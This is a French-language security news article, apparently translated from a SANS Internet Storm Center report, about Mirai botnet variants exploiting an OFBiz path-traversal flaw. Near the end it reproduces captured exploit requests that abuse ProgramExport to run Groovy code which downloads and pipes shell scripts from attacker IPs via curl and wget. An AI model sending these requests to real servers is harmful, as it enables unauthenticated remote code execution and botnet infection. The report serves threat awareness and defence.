Les logiciels de planification des ressources de l’entreprise (ERP) sont au c\u0153ur de nombreuses entreprises qui prennent en charge les ressources humaines, la comptabilit\u00e9, l’exp\u00e9dition et la fabrication. Ces syst\u00e8mes peuvent devenir tr\u00e8s complexes et difficiles \u00e0 entretenir. Ils sont souvent hautement personnalis\u00e9s, ce qui peut rendre la mise \u00e0 jour des correctifs difficile. Cependant, des vuln\u00e9rabilit\u00e9s critiques continuent d’affecter ces syst\u00e8mes et mettent en danger les donn\u00e9es commerciales critiques. <\/p>\n
Le centre de temp\u00eate Internet du SANS a publi\u00e9 un rapport<\/a> montrant comment le framework ERP open source OFBiz est actuellement la cible de nouvelles vari\u00e9t\u00e9s du botnet Mirai.<\/p>\n Dans le cadre de son vaste portefeuille de projets, la Fondation Apache soutient OFBiz<\/a>un framework bas\u00e9 sur Java pour la cr\u00e9ation d’applications ERP (Enterprise Resource Planning). OFBiz semble \u00eatre beaucoup moins r\u00e9pandu<\/a> que les alternatives commerciales. Cependant, comme pour tout autre syst\u00e8me ERP, les organisations s’appuient sur lui pour les donn\u00e9es commerciales sensibles, et la s\u00e9curit\u00e9 de ces syst\u00e8mes ERP est essentielle.<\/p>\n En mai de cette ann\u00e9e, un mise \u00e0 jour de s\u00e9curit\u00e9 critique<\/a> a \u00e9t\u00e9 publi\u00e9 pour OFBiz. La mise \u00e0 jour a corrig\u00e9 une vuln\u00e9rabilit\u00e9 de travers\u00e9e de r\u00e9pertoire qui pouvait conduire \u00e0 l’ex\u00e9cution de commandes \u00e0 distance. Les versions d’OFBiz ant\u00e9rieures \u00e0 18.12.13 ont \u00e9t\u00e9 affect\u00e9es. Quelques semaines plus tard, d\u00e9tails sur la vuln\u00e9rabilit\u00e9<\/a> ont \u00e9t\u00e9 rendus publics.<\/p>\n Les vuln\u00e9rabilit\u00e9s de travers\u00e9e de r\u00e9pertoire, ou de travers\u00e9e de chemin, peuvent \u00eatre utilis\u00e9es pour contourner les r\u00e8gles de contr\u00f4le d’acc\u00e8s. Par exemple, si un utilisateur peut acc\u00e9der \u00e0 un r\u00e9pertoire \u00ab \/public \u00bb mais pas \u00e0 un r\u00e9pertoire \u00ab \/admin \u00bb, un attaquant peut utiliser une URL comme \u00ab \/public\/..\/admin \u00bb pour tromper la logique de contr\u00f4le d’acc\u00e8s. R\u00e9cemment, la CISA et le FBI a publi\u00e9 une alerte<\/a> dans le cadre de l’initiative \u00ab\u00a0Secure by Design\u00a0\u00bb, ax\u00e9e sur la travers\u00e9e de r\u00e9pertoires. La CISA a soulign\u00e9 qu’elle surveillait actuellement 55 vuln\u00e9rabilit\u00e9s de travers\u00e9e de r\u00e9pertoires dans le cadre du catalogue \u00ab\u00a0Known Exploited Vulnerabilities\u00a0\u00bb (KEV).<\/p>\n Pour OFBiz, la travers\u00e9e du r\u00e9pertoire est facilement d\u00e9clench\u00e9e en ins\u00e9rant un point-virgule. Tout ce qu’un attaquant doit trouver est une URL \u00e0 laquelle il peut acc\u00e9der et ajouter un point-virgule suivi d’une URL restreinte. L’URL d’exploitation que nous voyons actuellement est :<\/p>\n <\/code><\/p>\n Comme les utilisateurs doivent pouvoir r\u00e9initialiser leurs mots de passe sans se connecter au pr\u00e9alable, \u00ab\u00a0forgotPassword\u00a0\u00bb ne n\u00e9cessite aucune authentification. \u00ab\u00a0ProgramExport\u00a0\u00bb, en revanche, doit \u00eatre contr\u00f4l\u00e9 par l’acc\u00e8s et inaccessible \u00e0 moins que l’utilisateur ne soit connect\u00e9. \u00ab\u00a0ProgramExport\u00a0\u00bb est particuli\u00e8rement dangereux dans la mesure o\u00f9 il permet l’ex\u00e9cution de code arbitraire. Une logique d\u00e9fectueuse dans OFBiz a arr\u00eat\u00e9 d’\u00e9valuer l’URL au point-virgule. Cela a permis \u00e0 n’importe quel utilisateur, sans se connecter, d’acc\u00e9der \u00e0 la deuxi\u00e8me partie de l’URL, \u00ab\u00a0\/ProgramExport\u00a0\u00bb. <\/p>\n Un attaquant doit utiliser une requ\u00eate POST pour exploiter la vuln\u00e9rabilit\u00e9, mais n’a pas n\u00e9cessairement besoin d’un corps de requ\u00eate. \u00c0 la place, un param\u00e8tre d’URL fera parfaitement l’affaire. <\/p>\n Le Centre de temp\u00eate Internet SANS<\/a> utilise un vaste r\u00e9seau de pots de miel pour d\u00e9tecter les tentatives d’exploitation d’un large \u00e9ventail de vuln\u00e9rabilit\u00e9s des applications Web. Les nouvelles tentatives d’exploitation importantes sont r\u00e9sum\u00e9es dans un \u00abVu la premi\u00e8re fois<\/a>” rapport. Ce week-end, ces capteurs ont d\u00e9tect\u00e9 une augmentation significative des tentatives d’exploitation de CVE-2024-32213, la vuln\u00e9rabilit\u00e9 de travers\u00e9e de r\u00e9pertoire OFBiz mentionn\u00e9e ci-dessus, qui a \u00e9t\u00e9 imm\u00e9diatement reprise par le rapport ” First Seen “.<\/p>\n Les tentatives d’exploitation provenaient de deux adresses IP diff\u00e9rentes qui \u00e9taient \u00e9galement associ\u00e9es \u00e0 diverses tentatives d’exploitation d’appareils IoT, g\u00e9n\u00e9ralement associ\u00e9es aux vari\u00e9t\u00e9s actuelles du botnet \u00ab Mirai \u00bb.<\/p>\n Les malfaiteurs ont utilis\u00e9 deux versions de l’exploit. La premi\u00e8re utilisait l’URL pour inclure la commande que l’exploit \u00e9tait cens\u00e9 ex\u00e9cuter :<\/p>\n <\/code> <\/p>\n Le second utilisait le corps de la requ\u00eate pour la commande, ce qui est plus courant pour les requ\u00eates \u00ab POST \u00bb :<\/p>\n <\/code> <\/p>\n Malheureusement, ni le script \u00ab bin.sh \u00bb ni le script \u00ab sh \u00bb n’ont \u00e9t\u00e9 r\u00e9cup\u00e9r\u00e9s. Les adresses IP ont \u00e9t\u00e9 impliqu\u00e9es dans des analyses le 29 juillet, \u00e0 l’aide de l’agent utilisateur \u00ab KrebsOnSecurity \u00bb, un clin d’\u0153il au blogueur infosec Brian Krebs. Cependant, les URL analys\u00e9es \u00e9taient pour la plupart des parasites, \u00e0 la recherche de shells Web existants laiss\u00e9s par des attaques pr\u00e9c\u00e9dentes. L’adresse IP a \u00e9galement \u00e9t\u00e9 utilis\u00e9e pour distribuer un fichier appel\u00e9 \u00ab botx.arm \u00bb. Ce nom de fichier est souvent associ\u00e9 aux variantes de Mirai.<\/p>\n Avec l’annonce de la vuln\u00e9rabilit\u00e9 en mai, nous attendions des analyses pour tirer parti de la vuln\u00e9rabilit\u00e9 OFBiz. L’exploitation \u00e9tait triviale, et bien que la population vuln\u00e9rable et expos\u00e9e soit petite, cela n’a pas arr\u00eat\u00e9 les attaquants dans le pass\u00e9. Mais ils exp\u00e9rimentent maintenant au moins et ajoutent peut-\u00eatre la vuln\u00e9rabilit\u00e9 \u00e0 des bots comme les variantes de Mirai.<\/p>\n Il n’y a que quelques adresses IP impliqu\u00e9es\u00a0:<\/p>\n Si vous avez trouv\u00e9 cet article int\u00e9ressant et souhaitez approfondir le monde de la s\u00e9curisation des applications Web, des API et des microservices, vous pouvez me rejoindre \u00e0 Network Security 2024 (du 4 au 9 septembre) pour mon cours, SEC522<\/a>. D\u00e9couvrez tout ce qui vous attend lors de l’\u00e9v\u00e9nement ici.<\/a><\/p>\n <\/p>\n<\/p>\n\/webtools\/control\/forgotPassword;\/ProgramExport<\/pre>\n
![\"\"](\"https:\/\/teknomers.com\/fr\/wp-content\/uploads\/2024\/08\/Le-botnet-Mirai-ciblant-les-serveurs-OFBiz-est-vulnerable-a.jpg\")
<\/a><\/div>\n<\/p>\nPOST \/webtools\/control\/forgotPassword;\/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https:\/\/95.214.27.196\/where\/bin.sh<\/pre>\n<\/p>\nPOST \/webtools\/control\/forgotPassword;\/ProgramExport HTTP\/1.1\nUser-Agent: Mozilla\/5.0 (Linux; Linux x86_64; en-US) Gecko\/20100101 Firefox\/122.0\nHost: [victim IP address]\nAccept: *\/*\nUpgrade-Insecure-Requests: 1\nConnection: keep-alive\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 147\ngroovyProgram=throw+new+Exception('curl https:\/\/185.196.10.231\/sh | sh -s ofbiz || wget -O- https:\/\/185.196.10.231\/sh | sh -s ofbiz'.execute().text);\n<\/pre>\n\n